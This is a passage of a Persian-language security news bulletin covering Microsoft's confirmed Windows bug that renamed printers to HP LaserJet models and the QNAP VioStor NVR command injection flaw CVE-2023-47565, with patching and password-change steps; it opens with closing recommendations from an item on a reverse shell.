2. اگر نشانه‌ای از تهدیدات احتمالی یافت شد، از منبع آن اطمینان حاصل شود و کارشناس مربوطه، مورد را بررسی کند.
4. در صورتی که دلایلی مستحکم مبنی بر وجود حمله یافت نشد، شاخص‌های مخرب مسدود شوند.

منبع خبر :


https://cybersecuritynews.com/snappytcp-reverse-shell

تایید باگ ویندوز در تغییر نام چاپگرها به HP LaserJet M101-M106

تاریخ ایجاد

شرکت مایکروسافت نقصی را تأیید کرده است که باعث می‌شود پس از تغییر نام همه چاپگرها به HP LaserJet M101-M106، برنامه HP Smart به طور خودکار در سیستم‌های ویندوز نصب شود. برخی کاربران ویندوز، این مشکل را در وب‌‌‌‌‌‌سایت انجمن مایکروسافت و در شبکه‌‌‌‌‌‌های اجتماعی آنلاین گزارش کرده‌‌‌‌‌‌اند.
بر اساس این گزارش‌‌‌‌‌‌ها، برنامه HP Smart به طور خودکار، حتی اگر کاربران دارای چاپگر یا کامپیوتر HP نباشند یا از آنها استفاده ‌‌‌‌‌‌نکنند، بر روی برخی کامپیوترهای دارای ویندوزهای 10 و 11، از طریق Microsoft Store نصب می‌شود. در حالی که در ابتدا، برخی از کاربران گمان می‌‌‌‌‌‌کردند که سیستم‌‌‌‌‌‌های آنها در معرض خطر قرار گرفته است، مایکروسافت اکنون تأیید کرده است که این یک مشکل شناخته شده است که بر پلتفرم کلاینت (Windows 10 1809 یا جدیدتر و ویندوز 11) و سرور (ویندوز سرور 2012 یا بالاتر) تأثیر می‌‌‌‌‌‌گذارد. طبق یافته‌های مایکروسافت، دستگاه‌های بدون دسترسی به Microsoft Store نباید تحت تأثیر این مشکل خاص قرار بگیرند.
در مشکل اخیر، تمام چاپگرها، صرف نظر از سازنده اصلی آنها، در سیستم‌‌‌‌‌‌های تاثیر پذیرفته به عنوان چاپگرهای HP برچسب‌‌‌‌‌‌گذاری می‌‌‌‌‌‌شوند و این احتمال وجود دارد که نماد چاپگرها نیز تغییر کند. بعلاوه هنگامی که کاربران سعی می‌‌‌‌‌‌کنند چاپگر را با دوبار کلیک کردن روی آن باز کنند، ممکن است پیام خطای روی صفحه را با عنوان "No tasks are available for this page" ببینند.
شرکت مایکروسافت اعلام کرده است که انتظار ندارد فرآیندهای چاپ تحت تأثیر این مشکل قرار گیرد و طبق روال معمول، کارهای چاپ، کپی یا اسکن باید در صف انجام کار قرار ‌‌‌‌‌‌گیرند. همچنین چاپگرهای دستگاه همچنان از درایورهای مورد انتظار برای عملیات چاپگر استفاده خواهند کرد.

محصولات تحت تاثیر
براساس اعلام شرکت مایکروسافت، نسخه‌‌‌‌‌‌های ویندوز 10 1809 و ویندوز 11 و نسخه‌‌‌‌‌‌های جدیدتر آنها و ویندوزهای سرور از سرور 2012 و نسخه‌‌‌‌‌‌های پس از آن تحت تأثیر چالش ایجاد شده قرار دارند. به نظر می-رسد این مشکل به دلیل ادغام اشتباه متادیتای ارسال شرکت HP با سیستم عامل ویندوز رخ داده است. این جزئیات و ادغام اشتباه در به‌‌‌‌‌‌روزرسانی‌‌‌‌‌‌های منتشر شده در هفته انتهایی نوامبر به سیستم‌‌‌‌‌‌های ویندوزی راه یافته است.
اختلال متادیتای Windows Update بر محصولات یا خدمات مایکروسافت از جمله Microsoft Print to PDF and XPS Document Writer تأثیر می‌‌‌‌‌‌گذارد و چاپگرهای دیگر، از جمله چاپگرها و پرینترهایEPSON  نیز به عنوان محصولات HP ظاهر می‌‌‌‌‌‌شوند.

توصیه‌های امنیتی
طبق اعلام شرکت مایکروسافت، این شرکت در حال بررسی این مشکل است و به زودی به‌‌‌‌‌‌روز‌‌‌‌‌‌رسانی آن را ارائه خواهد کرد. کاربران خانگی و تجاری که به دنبال کمک هستند، لازم است تا از طریق فرم آنلاین موجود در https://support.microsoft.com/contactus با پشتیبانی تماس بگیرند.

منابع خبر:


[1] https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-windows-bug-renames-printers-to-…
[2] https://www.windowslatest.com/2023/12/04/windows-update-accidentally-renames-all-printers-to-hp-m10…

آسیب‌پذیری تزریق فرمان سیستم‌عامل در QNAP

تاریخ ایجاد

شناسایی آسیب‌پذیری با شناسه‌ CVE-2023-47565 و شدت بالا 8.0 امکان تزریق فرمان سیستم‌عامل (OS command injection) را برای مهاجم احراز هویت شده فراهم می‌آورد. بهره‌برداری از این آسیب‌پذیری منجر به اجرای دستورات از طریق شبکه می‌شود.


محصولات تحت تأثیر
این آسیب‌پذیری مدل‌های قدیمی QNAP VioStor NVR با QVR Firmware 4.x را تحت تأثیر قرار می‌دهد.

توصیه‌های امنیتی
توصیه می‌شود کاربران در اسرع وقت نسبت به ارتقاء QNAP VioStor NVR  به QVR Firmware 5.x  و بالاتر اقدام نمایند و از رمزهای عبور قوی برای همه حساب‌های کاربری استفاده کنند.
تغییر رمز عبورکاربر در  QVR به صورت زیر است:
•    وارد QVR شوید.
•    به Control Panel > Privilege > Users بروید.
•    کاربری را که می خواهید ویرایش کنید انتخاب کنید.
توجه: فقط مدیران می‌توانند رمز عبور سایر کاربران را تغییر دهند.
•    روی نماد (icon) تغییر رمز عبور کلیک کنید.
•    یک رمز عبور جدید و قوی مشخص کنید.
•    رمز عبور را تأیید کنید.
•    روی Apply کلیک کنید.
به‌روزرسانی سیستم‌عامل QVR
•    به عنوان مدیر به QVR وارد شوید.
•    به Control Panel > System Settings > Firmware Update بروید.
•    تب Firmware Update را انتخاب کنید.
•    برای بارگذاری آخرین فایل Firmware، روی Browse... کلیک کنید.
نکته: آخرین فایل Firmware را برای مدل خاص خود از https://www.qnap.com/go/download بارگیری کنید. "Legacy NVR" را انتخاب کنید تا مدل خود را پیدا کنید.
•    روی Update System کلیک کنید.
•    QVR را به‌روزرسانی کنید.
 

منبع خبر:


https://www.qnap.com/en/security-advisory/qsa-23-48